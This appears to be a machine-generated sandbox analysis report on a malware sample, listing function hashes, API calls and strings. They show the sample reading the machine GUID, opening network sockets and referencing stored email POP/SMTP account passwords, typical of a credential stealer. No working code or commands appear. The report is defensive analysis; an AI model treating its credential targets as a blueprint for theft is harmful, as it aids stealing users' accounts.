Instruction ID: b19eb7a3cd87e69096771b345e5c2540af9e167fbe831640588bae58bfb7edbb
Opcode Fuzzy Hash: 2fd64f88d2493f2bb9aa5fb6b8c7b104c341cfce7db48d4f3f17305583593ad0
Instruction Fuzzy Hash: 1761A974E15219EFCB44CFA9E484A9EBBF1FB49310F1481AAE419EB320D734AA41CF55

Uniqueness

Uniqueness Score: -1.00%

Function 018B57B8 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92df8a45c2975c5183d0125adc14e39124bca07833da1ead8d78aaa1f66e77bc
Instruction ID: 4ba265a8bdca84a9286284726d1b8885ea831e14f74ce34cd36b3ec1ad92ab71
Opcode Fuzzy Hash: 92df8a45c2975c5183d0125adc14e39124bca07833da1ead8d78aaa1f66e77bc
Instruction Fuzzy Hash: 7661BA74E15218EFCB44CFA9D484A9EBBF1FB49314F1881AAE419EB321D734AA41CF11

Uniqueness

Uniqueness Score: -1.00%

Function 056A5C50 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bd5ab453d8334616d0cf194e737fa066d6d0293833fb0cf115f434baf6cdf7b
Instruction ID: ae7eb6d0be672f14c0dc76942daa854a351ae2fbfbe9910287fa48e9b823344f
Opcode Fuzzy Hash: 8bd5ab453d8334616d0cf194e737fa066d6d0293833fb0cf115f434baf6cdf7b
Instruction Fuzzy Hash: 2B51FEB5D0520ADFDB04CFA4C584AAEBBF2BB59300F24855AD416BB315D330AE42CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 018B61E0 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74109dd6f23522c45c4d12afdc044f67190be732e9bb0e633243b8a18d00dd4e
Instruction ID: 006c052110520eee326b55a188fc8a329af5da8c9b04ff0a5f4bbdfb9af6fc8b
Opcode Fuzzy Hash: 74109dd6f23522c45c4d12afdc044f67190be732e9bb0e633243b8a18d00dd4e
Instruction Fuzzy Hash: 085103B4D0621ADFDB04CFA8D5808EEFBB1FB48314B24955AD915EB311E330AA44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 018B61F0 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dcbc2b65172d282eeee5b98030228ed66afe23206d79a6a2c1527aa1da1b60c
Instruction ID: cf860de6148bb3798a79156e3c9f800d7e199e3e667550899d615dd1b2244b7d
Opcode Fuzzy Hash: 4dcbc2b65172d282eeee5b98030228ed66afe23206d79a6a2c1527aa1da1b60c
Instruction Fuzzy Hash: A051F2B4D1621ADFDB04CFA8D5808EEFBB1FB48350F24955AD915A7314E330AA44CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 018B3688 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7bcda5366fc5771fe149dfcd99456a09d166f065aaba41b70066f4ea8f0ecda
Instruction ID: f5ab04f3c9e9356a5280f0babba07a30a27cf4a7eb3a28608726bc2b7e8b3bc2
Opcode Fuzzy Hash: e7bcda5366fc5771fe149dfcd99456a09d166f065aaba41b70066f4ea8f0ecda
Instruction Fuzzy Hash: 1C51EFB4E0520ADFCB04CF98C6809EEBBF1BB49314F248569D905AB715D734AB41CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 018BCB28 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0374331a394b416fdb732b29c7f70e01e43412d34dff6029db14456a054160a6
Instruction ID: 83778f40605a89952cf74a0e01a93e4462a158ea5e12de022c267e656c5afd21
Opcode Fuzzy Hash: 0374331a394b416fdb732b29c7f70e01e43412d34dff6029db14456a054160a6
Instruction Fuzzy Hash: 6251BCB4D0420A9FCB04CFA8D5818EEFBF1FB59354F248656D915AB314C330AA81DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 018B6B91 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4b1db41a641852d808520c20d635fcf878c9ad2c29758684003b1c86bb0a22c
Instruction ID: 94afdef5271006b4c2cc4d70c699a928a9503fe638af51ef8db12da108717ba3
Opcode Fuzzy Hash: f4b1db41a641852d808520c20d635fcf878c9ad2c29758684003b1c86bb0a22c
Instruction Fuzzy Hash: C041F4B4D0920ADFCB04CFA5C5814EEFBB1FB89310F24956AC515BB214E734AB41CB95

Uniqueness

Uniqueness Score: -1.00%

Function 018B6BA0 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 815eb9662a4149b4b3ae1e7b193b24b630a04f1753ef4aa0c41828497c0220ce
Instruction ID: be0af261c354798ad8aaeedc5f288c4de47b3733701abe6527a8148249de3f8e
Opcode Fuzzy Hash: 815eb9662a4149b4b3ae1e7b193b24b630a04f1753ef4aa0c41828497c0220ce
Instruction Fuzzy Hash: C141E4B4D0520ADFCB04CFA5D5814EEFBB1FB89310F24956AC515BB214E734AB41CB95

Uniqueness

Uniqueness Score: -1.00%

Function 056ABC58 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f803a86466e3033c9314dfe2dd859cef4c90d9467d1552cd7569ea75b107
Instruction ID: 3adaae7aff37ea83085df69ac3dd98976588e00495c3c54e479636dda6b8f5a0
Opcode Fuzzy Hash: 7c05f803a86466e3033c9314dfe2dd859cef4c90d9467d1552cd7569ea75b107
Instruction Fuzzy Hash: 0341B475E04608CFEB18CFAAC944A9DFBF2AF88300F14C06AD805AB364DB749946CF55

Uniqueness

Uniqueness Score: -1.00%

Function 056AABA8 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cc9657450065368473740933b5213140169f0645f7c19611e5981924363efa8
Instruction ID: 37876cb199e23e01d204957ce12ca07a3ca86a710cce95276820380640bf70ed
Opcode Fuzzy Hash: 1cc9657450065368473740933b5213140169f0645f7c19611e5981924363efa8
Instruction Fuzzy Hash: 0441A1B5E04248CFEB18DFEAC544A9DBBF2AF88304F14C06AD819AB354D7349946CF55

Uniqueness

Uniqueness Score: -1.00%

Function 018B6791 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb3d3b1ce372902dc058ea877e7ab949515067b1fa705360b8d9d6bb85dca49c
Instruction ID: b249f0e2f5f5264b563ba45bd6f6bff4f78f1de667e860099970c2e38650037c
Opcode Fuzzy Hash: bb3d3b1ce372902dc058ea877e7ab949515067b1fa705360b8d9d6bb85dca49c
Instruction Fuzzy Hash: 644104B1D1420ADBDB04CFAAC5815EEFBB2FB88304F24C56AC416AB214E73497458F95

Uniqueness

Uniqueness Score: -1.00%

Function 018B67A0 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4797c3b67748ca03e8585729d1d074701e96cd873e725de207896a9640bb71dd
Instruction ID: 4d4adffc496123223ff4fdb1385fbe0b792186828d0dabefa993c157847bc6e8
Opcode Fuzzy Hash: 4797c3b67748ca03e8585729d1d074701e96cd873e725de207896a9640bb71dd
Instruction Fuzzy Hash: D94104B1D1420ADBDB04CFAAD5815EEFBB6FB88300F24C56AC425AB314E734A7458F95

Uniqueness

Uniqueness Score: -1.00%

Function 018BD100 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a357246e9b3af91348439ea59d0f455fb96e2c24b9cbe7f43c1c63a9e6614b25
Instruction ID: 6d284c4963f448d42666a14b9ca6ed18a4891c9199728d0169a4c40f28cd3558
Opcode Fuzzy Hash: a357246e9b3af91348439ea59d0f455fb96e2c24b9cbe7f43c1c63a9e6614b25
Instruction Fuzzy Hash: 9741F274D0460AEBCB04CFEAD5815EEFBF1AB88314F14D52AC415AA314D334AA818F95

Uniqueness

Uniqueness Score: -1.00%

Function 018BD530 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c3724aa1020682215aa7621eadb727d8e673a44ebcc1836bcc245749f8f12b
Instruction ID: f1098c2e6e3bc80220920fbaf319a94fa13c7c5a956f5afe76ea8a059f7027e8
Opcode Fuzzy Hash: 14c3724aa1020682215aa7621eadb727d8e673a44ebcc1836bcc245749f8f12b
Instruction Fuzzy Hash: D641F0B0D0520AEBCB04CFEAC5818EEFBB1BB89308F249569D415FB314D7309B418B95

Uniqueness

Uniqueness Score: -1.00%

Function 056A8C88 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb89b72636120747391b268799174c9a4cbb8aceefaedc143bd78b5c5b7b495c
Instruction ID: f7517f03fa170fc704bcc52da8782f752dbc68dc27c91961ca287eca8c8d4f78
Opcode Fuzzy Hash: fb89b72636120747391b268799174c9a4cbb8aceefaedc143bd78b5c5b7b495c
Instruction Fuzzy Hash: F231F2B1D0520ADBDB08DF9AC5815AEFBF2BF89300F10D46AD416A7214E734AA41CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 056A97C8 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa596de8750097ee3062b10caf111f8038f9bc5f5f4420f317823b9cdadefe86
Instruction ID: a9c85be1db6a82bdc65aed26d1174e13d71421d67b5202cb16aad4b6f9b76ff1
Opcode Fuzzy Hash: fa596de8750097ee3062b10caf111f8038f9bc5f5f4420f317823b9cdadefe86
Instruction Fuzzy Hash: C931D475E056098BDB08CFA6C5446AEFBF2BF89300F24C46AD805AB328D7749A46CF50

Uniqueness

Uniqueness Score: -1.00%

Function 018B81C1 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e6c3c2916231fbd5414fef275dd6d932c2ebf42fdca717956101fc5eb9455f5
Instruction ID: b8e5b7b526921a900f4511f78d45169174ca1a59621bae8a6beb91164a4c7c8f
Opcode Fuzzy Hash: 0e6c3c2916231fbd5414fef275dd6d932c2ebf42fdca717956101fc5eb9455f5
Instruction Fuzzy Hash: FC2128B0E016188FEB18CF6AD9403DEFBF2BFCA300F14C1AAD508AA215DB304A458F55

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: lqoUUYTMsL.exePID: 6408, Parent PID: 7104COMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
Total number of Nodes:	300
Total number of Limit Nodes:	13

Executed Functions

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_lqoUUYTMsL.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Uniqueness

Uniqueness Score: -1.00%

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_lqoUUYTMsL.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Uniqueness

Uniqueness Score: -1.00%

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_lqoUUYTMsL.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: 61234e47739be8c7060a32ecdecb60308da47ea11066a787c608e0506b8bf0d5
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: 61234e47739be8c7060a32ecdecb60308da47ea11066a787c608e0506b8bf0d5
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Uniqueness

Uniqueness Score: -1.00%

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_lqoUUYTMsL.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Uniqueness

Uniqueness Score: -1.00%

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_lqoUUYTMsL.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Uniqueness

Uniqueness Score: -1.00%

Function 00413A3F Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000,00000000,E567384D,00000000,00000000,?,00413B8D,00000000,?,?,004139CC,00000000), ref: 00413A54

Memory Dump Source

Source File: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_lqoUUYTMsL.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
Instruction ID: a51fc36abc950c8e07eb8ba8f8e19e2949325f4e0a3e122df0d5a7568418e784
Opcode Fuzzy Hash: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
Instruction Fuzzy Hash: 52B092B11042087EAA402EF19C05D3B3A4DCA44508B0044357C08E5422E936EE2050A4

Uniqueness

Uniqueness Score: -1.00%

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_lqoUUYTMsL.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_lqoUUYTMsL.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Uniqueness

Uniqueness Score: -1.00%

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

PopPort, xrefs: 0040D0A7
SmtpServer, xrefs: 0040D0DC
PopServer, xrefs: 0040D099
PopAccount, xrefs: 0040D0B6
SmtpPort, xrefs: 0040D0EB
SmtpAccount, xrefs: 0040D0FA
EmailAddress, xrefs: 0040D074
Technology, xrefs: 0040D08D
PopPassword, xrefs: 0040D0D0
SmtpPassword, xrefs: 0040D117

Memory Dump Source

Source File: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_lqoUUYTMsL.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_lqoUUYTMsL.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Uniqueness

Uniqueness Score: -1.00%

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_lqoUUYTMsL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Uniqueness

Uniqueness Score: -1.00%

Function 004061C3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261

Strings

IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B
IDA, xrefs: 00406304

Memory Dump Source

Source File: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_lqoUUYTMsL.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorLast
String ID: IDA$IDA
API String ID: 887189805-2020647798
Opcode ID: 8c9f743a95e2ed60ca48ebb2a141374e00de6ead3e6b7acbc24c92b4cfb516c3
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: 8c9f743a95e2ed60ca48ebb2a141374e00de6ead3e6b7acbc24c92b4cfb516c3
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Uniqueness

Uniqueness Score: -1.00%

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_lqoUUYTMsL.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
